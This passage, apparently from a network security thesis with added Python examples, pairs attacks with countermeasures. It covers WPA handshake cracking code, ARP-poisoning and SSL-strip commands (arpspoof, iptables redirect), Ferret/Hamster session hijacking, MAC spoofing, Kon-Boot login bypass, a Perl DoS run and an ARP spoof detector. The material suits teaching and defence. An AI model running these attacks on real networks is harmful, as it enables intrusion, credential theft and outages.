Wait a minute and, surprisingly, the complex password was cracked. Note that this succeeded only because that exact string was present in the dictionary used; a dictionary attack recovers nothing but passphrases that are in the list, and a long passphrase that is not in any list costs the attacker years rather than a minute.
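Why the dictionary attack works against TKIP and AES alike, and why it stops at the end of the word list, is clearest from the key derivation itself. The following Python is an added example for this edition, not code from the thesis, coWPAtty or aircrack-ng: it derives the pairwise master key from passphrase and SSID exactly as 802.11i specifies (PBKDF2-HMAC-SHA1, 4096 iterations), expands it to the key confirmation key using the MAC addresses and nonces from the handshake, recomputes the MIC of the second handshake message, and runs a candidate list against a handshake until the MIC matches. The handshake itself is constructed inside the example (the MAC addresses, nonces and the EAPOL frame layout are placeholders); a real capture from airodump-ng supplies the same fields. The key descriptor version selects HMAC-MD5 (TKIP) or HMAC-SHA1 (AES-CCMP) for the MIC, which is the only difference between the two cases.

```python
import hashlib
import hmac
import os
from typing import Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def kck_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs and nonces); KCK = first 128 bits."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)[:16]


def eapol_mic(kck: bytes, eapol_frame: bytes, key_version: int) -> bytes:
    """MIC over the EAPOL-Key frame (MIC field zeroed): HMAC-MD5 for TKIP, HMAC-SHA1-128 for CCMP."""
    if key_version == 1:
        return hmac.new(kck, eapol_frame, hashlib.md5).digest()
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack(handshake: dict, wordlist) -> Optional[str]:
    """Offline dictionary attack: one PBKDF2 per guess, then a cheap MIC comparison."""
    for guess in wordlist:
        kck = kck_from_pmk(pmk_from_passphrase(guess, handshake["ssid"]), handshake["ap_mac"],
                           handshake["sta_mac"], handshake["anonce"], handshake["snonce"])
        mic = eapol_mic(kck, handshake["eapol_msg2"], handshake["key_version"])
        if hmac.compare_digest(mic, handshake["mic"]):
            return guess
    return None


def make_handshake(passphrase: str, ssid: str, key_version: int) -> dict:
    """Constructed stand-in for a captured four-way handshake: placeholder MACs, random nonces and
    a schematic EAPOL-Key message 2 whose 16-byte MIC field is zeroed before the MIC is computed."""
    ap_mac = bytes.fromhex("001122aabbcc")
    sta_mac = bytes.fromhex("00aabbccddee")
    anonce, snonce = os.urandom(32), os.urandom(32)
    key_info = bytes([0x01, 0x08 | key_version])          # pairwise bit + descriptor version (schematic)
    eapol_msg2 = b"\x01\x03\x00\x75\x02" + key_info + b"\x00" * 16 + snonce + b"\x00" * 32
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce, "snonce": snonce,
            "key_version": key_version, "eapol_msg2": eapol_msg2,
            "mic": eapol_mic(kck, eapol_msg2, key_version)}


if __name__ == "__main__":
    hs = make_handshake("-pMxlionz c0nu3cti05ns-", "thesis-ap", key_version=2)
    print(crack(hs, ["password", "letmein", "-pMxlionz c0nu3cti05ns-"]))   # found: it is in the list
    print(crack(hs, ["password", "letmein"]))                              # None: not in the list
```

The 4096 PBKDF2 iterations are what make each guess cost a few milliseconds, which is exactly why a passphrase outside the attacker's list is safe and one inside it is not, regardless of TKIP or AES.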

Wi-Fi Protected Access (WPA/WPA2) Counter Attack

WPA/WPA2 is a far better method than WEP. As demonstrated above, though, WPA TKIP/AES with a pre-shared key is still vulnerable, and with a dictionary attack a weak password is easily retrieved. For SOHO users the WPA Enterprise option is usually out of reach because of its cost.

WPA-enabled appliances mandate a passphrase of 8 to 63 characters. The mitigation is to use all 63 characters if possible, or at least 25, and to pick a passphrase that is hard to guess and mixes letters, digits and special characters. The dictionaries used for these attacks grow day by day, so a passphrase that is not in them today may be in them tomorrow; change the passphrase regularly and never keep one for a long time.

Enterprise users should migrate to the RADIUS option and implement 802.1X, which carries EAP (Extensible Authentication Protocol) over the local area network and is therefore commonly known as "EAPOL" (EAP over LAN).

4.2 Man-in-the-middle

In a man-in-the-middle attack, as the name suggests, an intruder transparently intercepts the data flowing between a client and its gateway. The intruder impersonates the default gateway towards the client and impersonates the client towards the default gateway. It is a very powerful attack: it gives the intruder control over everything the victim PC sends and receives, and the ongoing communication lets the intruder steal usernames and passwords or even credit card information.

4.2.1 Man-in-the-middle attack

A combination of tools is used to launch a man-in-the-middle attack. ARP poisoning itself works on any broadcast segment, wired or Wi-Fi, but the wireless adapter and driver of the attacking machine may not cooperate with the tools; the workaround used here is VMware [32]. An intruder installs a virtual operating system in VMware and bridges it to the physical wireless network of the host operating system, so that the virtual machine sniffs everything on the wireless network. The demonstration below applies to both wired and wireless networks; for the wireless case, use VMware.

First, look at who is around by listing the ARP cache, with the following command at a Linux terminal or a Windows command prompt.

arp -a

This lists the neighbours on the current subnet that the machine has recently talked to (the cache is not a full inventory; a ping sweep or an nmap scan of the subnet fills it in). Pick any client from the list and use nmap [33], a tool for Linux and Windows that scans the target for open ports. In this case the client picked from the ARP cache is scanned for active services. While nmap is running in the background, use Cain & Abel [20] on Windows or ettercap [21] on Linux to perform the man-in-the-middle attack.


Open the tool and scan the whole subnet for available victims. Choose the default gateway and any victim, and start poisoning. Once poisoning succeeds, all of the victim's data passes through the intruder's PC.

Now it is time to sniff the data. Many sniffers are available; the most popular is Wireshark [26]. Wireshark captures on wired and wireless interfaces alike, but the Windows wireless drivers rarely support promiscuous capture, so for wireless networks use the same VMware option with a bridged connection.

4.2.2 Man-in-the-middle Counter Attack

It is not possible to rule out man-in-the-middle attacks completely. On a LAN or a wireless network it can even be a legitimate client who launches one. The best defence is encryption. Encrypting our data has, of course, its downside in the form of performance degradation, but on the plus side the attacker is unable to understand what he or she has captured.

For SOHO users, a wireless access point without 802.1X technology offers no guarantee of protection. Formerly access points were sold separately for SOHO and enterprise users, but now they come with 802.1X support.

Enabling 802.1X differs between wireless and wired networks. Wireless access points have 802.1X built into their firmware, so it is easily enabled. On wired networks with switches it requires an authentication server; here that is a NAC (Network Admission Control) server [9]. Network Admission Control and its configuration are discussed in detail in the next chapter.

For an enterprise network whose LAN passes through a residential gateway via the router, use an Easy VPN [27] server. Easy VPN provides authentication, integrity, confidentiality and anti-replay protection for the packets; every packet is authenticated with an HMAC based on MD5 or SHA. Easy VPN is discussed and configured in chapter 6.
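Since a man-in-the-middle on the LAN cannot be ruled out, it pays to watch for the ARP poisoning that sets it up. The following Python is an added example for this edition, not from the thesis or from any of the tools it names: it reads ARP reply lines in the format tcpdump prints ("ARP, Reply <ip> is-at <mac>"), keeps a table of which MAC has answered for which IP, and raises an alert when the gateway's MAC changes away from a known-good entry, when any IP's MAC changes, or when one MAC starts answering for more than one IP, which is what an arpspoof or ettercap session looks like on the wire. The sample lines and the trusted gateway entry are constructed; the addresses are placeholders.

```python
import re
from collections import defaultdict

ARP_REPLY = re.compile(
    r"ARP, Reply (?P<ip>\d+\.\d+\.\d+\.\d+) is-at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.I)

# Constructed sample in tcpdump's ARP output format: the host at 192.168.1.10 starts
# answering for the gateway 192.168.1.1 part way through (placeholder addresses).
SAMPLE = """\
12:00:01.000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:01, length 28
12:00:01.500 ARP, Reply 192.168.1.10 is-at 00:aa:bb:cc:dd:10, length 28
12:00:02.000 ARP, Reply 192.168.1.20 is-at 00:aa:bb:cc:dd:20, length 28
12:00:05.000 ARP, Reply 192.168.1.1 is-at 00:aa:bb:cc:dd:10, length 28
12:00:07.000 ARP, Reply 192.168.1.1 is-at 00:aa:bb:cc:dd:10, length 28
12:00:09.000 ARP, Reply 192.168.1.20 is-at 00:aa:bb:cc:dd:20, length 28
"""

# What a static ARP entry for the gateway would pin down (constructed).
TRUSTED = {"192.168.1.1": "00:11:22:33:44:01"}


def detect_arp_spoofing(lines, trusted=None):
    """Return a list of distinct alert strings, in the order the conditions were first seen."""
    trusted = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    seen = {}                         # ip -> mac last seen answering for it
    ips_for_mac = defaultdict(set)    # mac -> ips it has answered for
    alerts = []

    def alert(msg):
        if msg not in alerts:         # report each condition once
            alerts.append(msg)

    for line in lines:
        m = ARP_REPLY.search(line)
        if not m:
            continue
        ip, mac = m.group("ip"), m.group("mac").lower()
        if ip in trusted and mac != trusted[ip]:
            alert(f"spoofed: {ip} is pinned to {trusted[ip]} but {mac} is answering for it")
        elif ip in seen and seen[ip] != mac:
            alert(f"changed: {ip} moved from {seen[ip]} to {mac}")
        ips_for_mac[mac].add(ip)
        if len(ips_for_mac[mac]) > 1:
            alert(f"one MAC for many IPs: {mac} answers for {sorted(ips_for_mac[mac])}")
        seen[ip] = mac
    return alerts


if __name__ == "__main__":
    for a in detect_arp_spoofing(SAMPLE.splitlines(), TRUSTED):
        print(a)
```

A static ARP entry for the gateway on each client is the same idea applied as prevention rather than detection: the poisoned reply is still received, but it is ignored.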

4.3 Man-in-the-middle with SSL Strip

Visit a secure website such as www.paypal.com and notice the "s" after "http" in the browser's address bar. It stands for HTTP over the Secure Sockets Layer (SSL) and indicates that the connection to the site is encrypted and that the server has presented a certificate for its name; it says nothing about the site's trustworthiness. SSL uses asymmetric cryptography to set up the connection: the server keeps a private key and publishes the matching public key in its certificate, which every connecting client receives. The client uses that public key (typically 1024-bit RSA at the time of writing) to agree a session key with the server, something only the holder of the private key can complete, and the confidential data, such as the username and password the client enters, is then encrypted with that session key. Nobody else can decrypt the data, and the private key cannot feasibly be derived from the public key.

Once the "s" is there the data is protected by this scheme, so the man-in-the-middle attack has to act before it: an intruder already in the middle can strip the "s" off the links and redirects the client sees before the server is ever reached. All of the client's data is then sent to the intruder over plain HTTP, and the intruder forwards it to the server over HTTPS. Both server and client are deceived, and the client's credentials are captured in clear text.


4.3.1 Man-in-the-middle with SSL Strip Attack

This illustration is performed on Linux, and the procedure differs from that of section 4.2: the ARP poisoning is done from the command line. First, use nmap to find the active hosts on the network.

nmap -sC -O 192.168.1.0/24

This scans the whole subnet for active hosts (-O adds operating system detection, -sC runs the default scripts). Now check the kernel's IP forwarding flag.

cat /proc/sys/net/ipv4/ip_forward

This command returns 0. IP forwarding means passing traffic that arrives on one interface on to another interface; in this case the single Ethernet or wireless interface acts as both the receiving and the sending interface. While the value is zero no forwarding takes place, and the poisoned victim would lose connectivity, so change it to 1 with the following command.

echo 1 > /proc/sys/net/ipv4/ip_forward

Issue the first command again to confirm that the value is now 1.

Now a little game with iptables. iptables is the access list of the Linux world: going back to CCNA terms, certain traffic is denied, allowed or redirected using access lists. Here iptables redirects the web traffic coming from the client on the standard port to a local port on the intruder's computer. Issue the following command to set up the redirection.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

The machine is now ready for IP forwarding and port redirection. With the above in place, launch the man-in-the-middle attack.

arpspoof -i eth0 -t <client-ip> <ip-address-of-gateway>

for wired networks, or

arpspoof -i wlan0 -t <client-ip> <ip-address-of-gateway>

for wireless networks. This poisons only the client's ARP cache (telling it that the intruder is the gateway), which is enough here because it is the client's outgoing web traffic that must be redirected.

The tool sslstrip is written in Python. Install the script and run it in another terminal while the ARP spoofing is under way.

./sslstrip.py -l 8080

It listens on port 8080 for the traffic that iptables redirected to the local host. Now go to www.paypal.com on the victim's PC and check that the browser shows http, not https. To confirm, check an ordinary PC that is not under attack: it will be greeted with https. The victim's computer does not show https because the intruder, acting as its default gateway, strips the client's https links down to plain http, which is clear text. The server still requires https, so the intruder does that part on the client's behalf, passing the client's requests through its own computer to the server.
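What sslstrip actually does to the traffic passing through the intruder's machine can be shown in a few lines. The following Python is an added example for this edition, not sslstrip's own code: a model of the stripping proxy that rewrites https links and redirects in the server's responses to http, remembers which hosts it downgraded so that it can speak https to them upstream, drops the Secure attribute from cookies so the browser keeps sending them over plain http, and discards a Strict-Transport-Security header so the browser never learns to insist on https. The sample response and cookie are constructed; www.paypal.com is the site used in the text.

```python
import re
from urllib.parse import urlsplit

HTTPS_URL = re.compile(r"https://([^\s\"'<>]+)")


class StripProxy:
    """Model of an HTTPS-stripping proxy: plain http towards the victim, https towards the server."""

    def __init__(self):
        self.stripped_hosts = set()      # hosts the victim has been told are plain http

    def downgrade_body(self, body: str) -> str:
        """Rewrite every https:// link to http:// and remember the host."""
        def repl(m):
            self.stripped_hosts.add(m.group(1).split("/")[0].lower())
            return "http://" + m.group(1)
        return HTTPS_URL.sub(repl, body)

    def downgrade_headers(self, headers: dict) -> dict:
        """Apply the same idea to the response headers the browser acts on."""
        out = {}
        for name, value in headers.items():
            key = name.lower()
            if key == "location":                       # redirect to https -> redirect to http
                value = self.downgrade_body(value)
            elif key == "set-cookie":                   # a Secure cookie would never be sent over http
                value = re.sub(r";\s*secure(?=;|$)", "", value, flags=re.I)
            elif key == "strict-transport-security":    # the browser-side defence: never let it through
                continue
            out[name] = value
        return out

    def upstream_scheme(self, client_request_url: str) -> str:
        """When the victim's plain http request arrives, decide how to talk to the real server."""
        host = (urlsplit(client_request_url).hostname or "").lower()
        return "https" if host in self.stripped_hosts else "http"


def demo() -> dict:
    proxy = StripProxy()
    # Constructed server response, as it would arrive from www.paypal.com over https.
    page = '<a href="https://www.paypal.com/signin">Log in</a> <img src="http://cdn.example.net/logo.png">'
    headers = {
        "Set-Cookie": "session=abc123; Secure; HttpOnly",
        "Strict-Transport-Security": "max-age=31536000",
        "Content-Type": "text/html",
    }
    return {
        "body": proxy.downgrade_body(page),
        "headers": proxy.downgrade_headers(headers),
        "login_upstream": proxy.upstream_scheme("http://www.paypal.com/signin"),
        "image_upstream": proxy.upstream_scheme("http://cdn.example.net/logo.png"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "=>", v)
```

A browser that has already seen the Strict-Transport-Security header over a genuine https connection refuses the downgraded http link outright, which is why the header is worth sending with a long max-age; the proxy can only suppress it for a victim who has never visited the site securely.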


4.3.2 Man-in-the-middle with SSL Strip Counter Attack

As discussed for the man-in-the-middle attack, use encryption. Packets that are already encrypted before they leave the client can never be stripped by the intruder: use a VPN [16] or Easy VPN as a layer 3 defence. It is also recommended not to use wireless Internet access at public Wi-Fi hotspots. The stripping only works because the browser's first request goes out over plain http and the user does not notice the missing "s"; typing https:// explicitly, or using a browser that remembers that the site requires https (HTTP Strict Transport Security, standardised after this thesis was written), closes that gap.

4.4 Session Hijacking

When a client connects to the Internet and browses a website or checks e-mail, the server side of the application (web or mail server) assigns the client a temporary session identifier, which the server keeps in its session table and which the client's browser stores and sends back with every request. The session stays associated with the client for as long as it is active; once the page is closed or the session times out, the identifier is discarded. An e-mail service does the same as a client moves back and forth inside the mailbox. Some services store this session information on the client PC for future use, so that the user does not have to enter the e-mail ID and password again and again; this storage of session identifiers on the client PC is what "cookies" are.

It is very easy, with a Linux or Windows system on the same LAN or wireless network, to capture those cookies as they pass by in clear-text HTTP requests. So while a client is checking e-mail, an intruder can hijack the session by replaying the cookie and move around the victim's mailbox.

To illustrate session hijacking, a Windows box is used in this demonstration. First download the tools Ferret and Hamster [37]. These tools are command-line programs with no graphical user interface, so make sure that each command is typed correctly.

Open the command prompt, get inside the folder and type the following command:

C:\sidejacking>ferret.exe –W

The command will list the current adapters and their numbers. Pick the correct adapter which is

going to be used in session hijacking and note down its number at the beginning of the line and

input the following command:

C:\sidejacking>ferret.exe –i <number>

Now the adapter is in listening mode and will search for all the active sessions going around the

local area network. Open a new command prompt and run hamster.

C:\sidejacking>hamster.exe

While listening, open Mozilla firefox > Tools > options > Network > Settings. Select manual

configuration and enter 127.0.0.1 in HTTP proxy and port 3128. Click OK. Type http://hamster

in the address bar and, at this stage, all the clients on local area network will be shown in the list

on the right. Click on any IP address and check the panel on the left of the browser windows,

which will show all the sessions of the targeted client. Click on any link, and the client‟s session

will be opened in the intruder‟s window.


4.4.1 Session Hijacking Counter Attack

Most services, such as Yahoo!, Hotmail and Gmail, give users the option of saving a session on the local computer so that they can return without entering their credentials again; this is done with a cookie. Avoid keeping such persistent login cookies on untrusted networks: a cookie that stays valid can be copied to the intruder's computer even when you are not using that particular session at the time of the hijacking. Above all, use encryption, and if you do, encrypt the whole session rather than just the login page, so that the cookie is never sent in the clear and nobody can sniff and understand the communication.

4.5 Copying IP telephony conversation

IP telephones are usually daisy-chained in line with the computer: the cable from the switch is plugged into the IP phone, and a second cable runs from the phone to the computer. The benefit of this deployment is that it halves the number of cable runs and saves a switch port per desk. The downside is that, if the network administrator forgets to configure the phone and switch properly, the phone conversation passes the computer's network adapter and can be copied there and played back as a WAV file.

4.5.1 IP telephony conversation – Attack

VOMIT [34] is used to launch an attack against an IP phone. The tool works only on Linux. Download and install it, capture the call with a packet sniffer (phone.dump below is a tcpdump capture file of the RTP stream), and then run the following command to play the conversation.

vomit -r phone.dump | waveplay -S8000 -B16 -C1

IP telephony uses a CODEC [42] to digitise the voice and send it across the network in packets. VOMIT can only decode G.711 CODEC conversations. Note also that the IP phone must be in line with the computer for the capture to see the traffic, and that the conversation can only be played back once the victim has ended the call and the capture is complete.

4.5.2 IP telephony conversation – Counter Attack

VLANs logically divide a local area network into multiple subnets. A Cisco IP phone can tag its frames with VLAN information, whereas a computer is normally not configured to tag frames for the switch. When an IP phone is placed in line with a computer and both fall in the same VLAN, an intruder can easily copy the phone conversation to the computer and convert it to a wave file.

Newer Cisco switches support a separate VLAN for phones. They protect against this attack by introducing a special VLAN for IP phones, called the "voice VLAN", so the phone's conversation and the computer's data are on different VLANs and the conversation cannot be copied from the computer. Note that this is segregation, not authentication: a computer whose network driver is set to send 802.1Q-tagged frames can tag into the voice VLAN itself, so the voice VLAN should be combined with the switch-port controls discussed in the following sections.

4.6 MAC address spoofing

Network administrators commonly implement MAC address restrictions on the network: only those MAC addresses that appear in the allowed-MAC table are granted access. If an intruder connects a computer to the local area network he cannot access it, because his MAC address is not in the table. An intruder can easily overcome this restriction by spoofing his MAC address to one that is already active on the network. The same practice is common on wireless networks, where an administrator assigns static MAC leases so that only clients with listed MAC addresses may connect. An intruder overcomes these hurdles by assigning a static IP address to his computer, scanning the whole subnet with nmap, finding the active hosts and spoofing one of their MAC addresses in order to use the network.

4.6.1 MAC address spoofing – Attack

MAC address spoofing can be performed on both Linux and Windows. On Linux no special software is needed; it is done from the command line. On Windows, change it through the registry or with a program called SMAC [45].

To spoof a MAC address on Linux, open a terminal and bring the network adapter down (eth0 for the wired adapter, wlan0 for the wireless one). Then change the MAC address and finally bring the adapter back up.

ifconfig eth0 down
ifconfig eth0 hw ether <mac-address>
ifconfig eth0 up

To change the MAC address on Windows, follow these steps.

Go to Network Connections, right-click the adapter to be spoofed and click Properties.

On the General tab click Configure, then Advanced, and in the Property list select Network Address (also labelled Locally Administered Address).

Click "Value" and type the new MAC address.

Restart the system.

Remember that a MAC address is 48 bits long, i.e. 12 hexadecimal digits. On Linux write a colon after every two digits; on Windows the Value field takes the 12 digits without separators (the dash-separated form is how Windows displays the address, not how it is entered).

4.6.2 MAC address spoofing – Counter Attack

MAC spoofing cannot be stopped completely, but it can be controlled. For a standalone wireless access point in a SOHO environment, first try to implement 802.1X: it requires authentication, so even with a spoofed MAC address the intruder still has to authenticate.

If the access point is connected to a switch in a local area network, stop the DHCP server on the access point, drop the MAC address binding there, and let the switch configuration govern all users. Again, MAC address restriction or binding MAC addresses to DHCP leases is not a real option, since the allowed list is exactly what the intruder copies; use a NAC server instead.

4.7 Bypassing the Login Password

On both Linux and Windows it is possible, given physical access, to patch the running kernel so that the password check for the current user is bypassed. The login prompt then grants access to the operating system without the current password being entered.

4.7.1 Bypassing the login password – Attack

This technique needs no special knowledge or command-line configuration. Download Kon-Boot [51] and burn it to a CD or write it to a USB stick. Insert the USB stick or CD, and make sure that the boot device priority in the BIOS puts the CD-ROM or USB first. At start-up, before the Windows screen, Kon-Boot loads for a moment and patches the kernel in memory so that the password check is bypassed. Kon-Boot then lets Windows resume loading, and no password is required at the logon screen. The stored password is not changed, so the owner notices nothing afterwards.

4.7.2 Bypassing the login password – Counter Attack

Enter the BIOS and change the boot device priority: make sure that the hard drive is in first place and disable the other entries. Secondly, put a password on the BIOS so that someone who wants to try this tool on the system cannot get into the BIOS settings to change the boot priority. Be aware that this only raises the bar: a BIOS password can be cleared by anyone who can open the case and reset the CMOS, and the disk can be read in another machine, so the data on it is only safe if the disk itself is encrypted.

4.8 Port redirection

In port redirection an intruder redirects data from one port to another. If an administrator has blocked the ports used by certain applications inside the network, such as instant messaging software, while allowing the ports for web browsing, e-mail and so on, an intruder can easily tunnel the messenger data through the web or e-mail port.

4.8.1 Port redirection – Attack

Port redirection works best on Linux, but there is a Windows version too. Download rinetd [11]. On Linux, compile it; before it can run it needs a configuration file in which the redirection rules are specified.

Every server in the world has its own IP address. For example, the Yahoo! Messenger server has the IP address 76.13.15.43 and accepts connections on TCP port 5050. If an administrator has blocked port 5050 and allowed only standard ports such as 80, 25 or 21, then rinetd, running on a machine that the client is allowed to reach on port 80 (a host outside the filtered network, or any host the firewall does not filter), can tunnel the Yahoo! port 5050 connection through port 80 or 25.

First create the configuration file with the following command.

vi /etc/rinetd.conf

Each rule has the form "bind-address bind-port connect-address connect-port". Type the following line in rinetd.conf, where 0.0.0.0 stands for every address of the machine rinetd runs on:

0.0.0.0 80 76.13.15.43 5050

The rule is simple: accept connections arriving on port 80 of this machine and pass each of them on to 76.13.15.43 on port 5050. The messenger client is then pointed at this machine's address on port 80, a port the firewall allows. Save the file, exit to the command prompt and type the following command to start the port redirection service:

./rinetd


If there is still a connectivity issue, it could be due to a wrong server IP address or a wrong destination port.

4.8.2 Port redirection – Counter Attack

In order to stop intruders from performing port redirection, some countermeasure analysis should be considered first. If an administrator has implemented only a simple firewall in which data restriction is based purely on ports, then there is no way to stop port redirection. In chapter 6 we will implement NBAR (Network-Based Application Recognition). NBAR checks the inner contents of a packet, and permission or denial is based on those contents.
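The difference between port-only filtering and content-based recognition, as an added example that is not part of the thesis: the flows below are constructed, the YMSG magic of Yahoo! Messenger and the HTTP/SMTP request starts are real signatures, and the rest is a simplified model of what NBAR does on a router.

```python
"""Port-based versus content-based filtering (added example, not from the thesis).

The flows below are constructed. The YMSG magic of the Yahoo! Messenger protocol
and the HTTP/SMTP request starts are real signatures; the rest is a simplified
model of what NBAR does on a router.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dst_port: int
    payload: bytes  # first bytes sent by the client


# Payload prefix -> application. Real NBAR has far richer matchers; this is
# enough to show why a port number alone cannot identify an application.
SIGNATURES = (
    (b"GET ", "http"), (b"POST ", "http"), (b"HEAD ", "http"),
    (b"EHLO ", "smtp"), (b"HELO ", "smtp"),
    (b"YMSG", "yahoo-messenger"),
)
# Application expected on each well-known port.
PORT_APPS = {80: "http", 25: "smtp", 5050: "yahoo-messenger"}


def classify(flow: Flow) -> str:
    """Identify the application from the payload, ignoring the port."""
    for prefix, app in SIGNATURES:
        if flow.payload.startswith(prefix):
            return app
    return "unknown"


def port_only_allows(flow: Flow, allowed_ports: set) -> bool:
    """A port-only firewall: the simple filtering described in 4.8.2."""
    return flow.dst_port in allowed_ports


def content_allows(flow: Flow, allowed_apps: set) -> bool:
    """An NBAR-style decision: permit only recognised, allowed applications.
    Unknown payloads are denied (fail closed)."""
    return classify(flow) in allowed_apps


def redirected_flows(flows):
    """Flows whose payload does not match the application expected on the
    destination port: the fingerprint of rinetd-style port redirection."""
    return [f for f in flows
            if f.dst_port in PORT_APPS and classify(f) != PORT_APPS[f.dst_port]]


# Constructed sample: a normal web request, Messenger traffic tunnelled over
# port 80 through the gateway, and a direct Messenger connection on its port.
SAMPLE_FLOWS = [
    Flow("192.168.1.10", "203.0.113.5", 80, b"GET / HTTP/1.1\r\nHost: example.com"),
    Flow("192.168.1.10", "192.168.1.1", 80, b"YMSG\x00\x10\x00\x00\x00\x4c"),
    Flow("192.168.1.11", "76.13.15.43", 5050, b"YMSG\x00\x10\x00\x00\x00\x4c"),
]


def audit(flows=SAMPLE_FLOWS):
    """Per flow: (port, classified app, port-only verdict, content verdict).
    Policy: only web and mail are allowed."""
    allowed_ports = {80, 25, 21}
    allowed_apps = {"http", "smtp"}
    return [(f.dst_port, classify(f), port_only_allows(f, allowed_ports),
             content_allows(f, allowed_apps)) for f in flows]


if __name__ == "__main__":
    for row in audit():
        print("port=%d app=%s port_firewall=%s nbar=%s" % row)
```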

4.9 Denial of Service (DoS)

In a DoS attack, an intruder sends a series of fake requests and overwhelms the network so badly that it can hardly serve any other requests, thus bringing the whole network down. A DoS attack can be tracked and stopped fairly easily, but intruders have now moved to the next step, the DDoS (Distributed Denial of Service) attack, in which the intruder launches multiple DoS attacks at once and thus hits the network more severely.

4.9.1 Denial of Service (DoS) – Attack

Many scripts are available in hacker libraries that aid the launching of DoS attacks. This demonstration uses Perl scripting to launch a DoS attack. Make sure that Perl has been installed on the system before running the script; the script works on Linux or Windows as long as Perl is installed.

Download a sample script from [22]. Change to the directory containing the file and type the following command:

perl <filename>.pl

The terminal will prompt for a host name. Enter the target and press "enter". The terminal will then prompt for a forum; just leave that blank. Wait a minute and check the target; it will no longer be accessible. To perform a DDoS attack, open many terminals and repeat the above in each of them.

4.9.2 Denial of Service (DoS) – Counter Attack

In smaller deployments, use CBAC with RFC 1718 filtering on the router. CBAC inspects traffic, creates a state table and allows a return path only for traffic that was initiated from the internal network. Apply a strict policy on the external side, so that any uninvited traffic is immediately dropped. Use RFC filtering so that all packets from the private IP addressing schemes are dropped immediately when they arrive from the external network. Also apply login security options on the router, which will stop intruders from launching brute force attacks against passwords.

For larger deployments, use an IPS. An IPS checks traffic patterns and, if it finds irregular or malicious patterns in the traffic flow, it immediately drops the packet and sends a report to the management console.


4.10 Layer 1 Security Issues

Cisco documentation suggests placing all routers and switches, including workstations, in an isolated and locked room. The room should only be accessible to authorized users; nobody else should be allowed inside. Provide a UPS (uninterruptible power supply) to all the devices, so that there is never a single second of downtime. Network devices produce heat and can operate between 0 and 40 °C [47], so make sure that a cooling unit is installed in the NOC (Network Operation Centre) to control the temperature.

Isolate cables from users' reach if possible, because cables can be wiretapped [52]: a bridge introduced between cable segments can record the whole communication. Good quality cables, such as shielded twisted-pair copper or fibre, should be used in order to avoid crosstalk. Keep data cables away from electrical power runs, as they can be disturbed by the magnetic field produced by the current.

Use of hubs is strictly forbidden; use a switch instead. It is highly recommended to use switches inside a network and to migrate from hubs to switches wherever possible.

4.11 Layer 2 Security Issues

There are many switch-related issues that a network administrator should consider while securing a switch.

4.11.1 CAM Overflow

Every switch can store a certain number of MAC addresses in its MAC address table. An intruder can send frames with fake source MAC addresses to a switch until the table is full, at which point the switch floods frames out of all ports like a hub. CAM overflow is performed with a tool known as dsniff [6]. It is important to configure a switch properly to defend against CAM overflow; see appendix C for the configuration.

Figure 1 CAM Overflow


The figure shows how an intruder can exhaust the switch CAM table either through direct access or through a wireless access point.
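A toy model of the CAM table under MAC flooding, with and without the per-port MAC limit that appendix C's port-security configuration enforces; this is an added example, not code from the thesis, and the switch model (one table, no VLANs, no ageing) is a simplification.

```python
"""Switch CAM table under MAC flooding, with and without a per-port MAC limit.

Added example, not from the thesis. The switch is a toy model (one CAM table,
no VLANs, no ageing) built to show why CAM overflow turns a switch into a hub
and how a port-security style limit stops it.
"""
from collections import OrderedDict


class Switch:
    def __init__(self, ports, cam_size, max_macs_per_port=None):
        self.ports = list(ports)
        self.cam_size = cam_size
        self.max_macs = max_macs_per_port
        self.cam = OrderedDict()     # mac -> port; oldest entry first
        self.err_disabled = set()    # ports shut down after a violation
        self.flooded = 0             # frames sent out of every port

    def _learn(self, mac, port):
        """Learn the source MAC on a port. Returns False if the port is shut down."""
        if port in self.err_disabled:
            return False
        if mac in self.cam:
            self.cam.move_to_end(mac)
            return True
        if self.max_macs is not None:
            on_port = sum(1 for p in self.cam.values() if p == port)
            if on_port >= self.max_macs:
                self.err_disabled.add(port)   # port-security violation: err-disable
                return False
        if len(self.cam) >= self.cam_size:
            self.cam.popitem(last=False)      # table full: evict the oldest entry
        self.cam[mac] = port
        return True

    def forward(self, src_mac, in_port, dst_mac):
        """Return the list of egress ports for one frame."""
        if not self._learn(src_mac, in_port):
            return []
        if dst_mac in self.cam and self.cam[dst_mac] != in_port:
            return [self.cam[dst_mac]]        # known destination: unicast
        self.flooded += 1
        return [p for p in self.ports if p != in_port]   # unknown: hub behaviour


def flood_scenario(max_macs_per_port=None, fake_macs=500):
    """Constructed scenario: hosts A (port 1) and B (port 2) talk, an attacker
    on port 3 sends frames from fake MACs, then A sends to B again.
    Returns (attacker_port_err_disabled, attacker_received_A_to_B_frame)."""
    sw = Switch(ports=[1, 2, 3], cam_size=256, max_macs_per_port=max_macs_per_port)
    a, b = "00:00:00:00:00:0a", "00:00:00:00:00:0b"
    sw.forward(a, 1, b)           # A -> B: B not yet learned, flooded once
    sw.forward(b, 2, a)           # B -> A: now both hosts are known
    for i in range(fake_macs):    # flood of frames with fabricated source MACs
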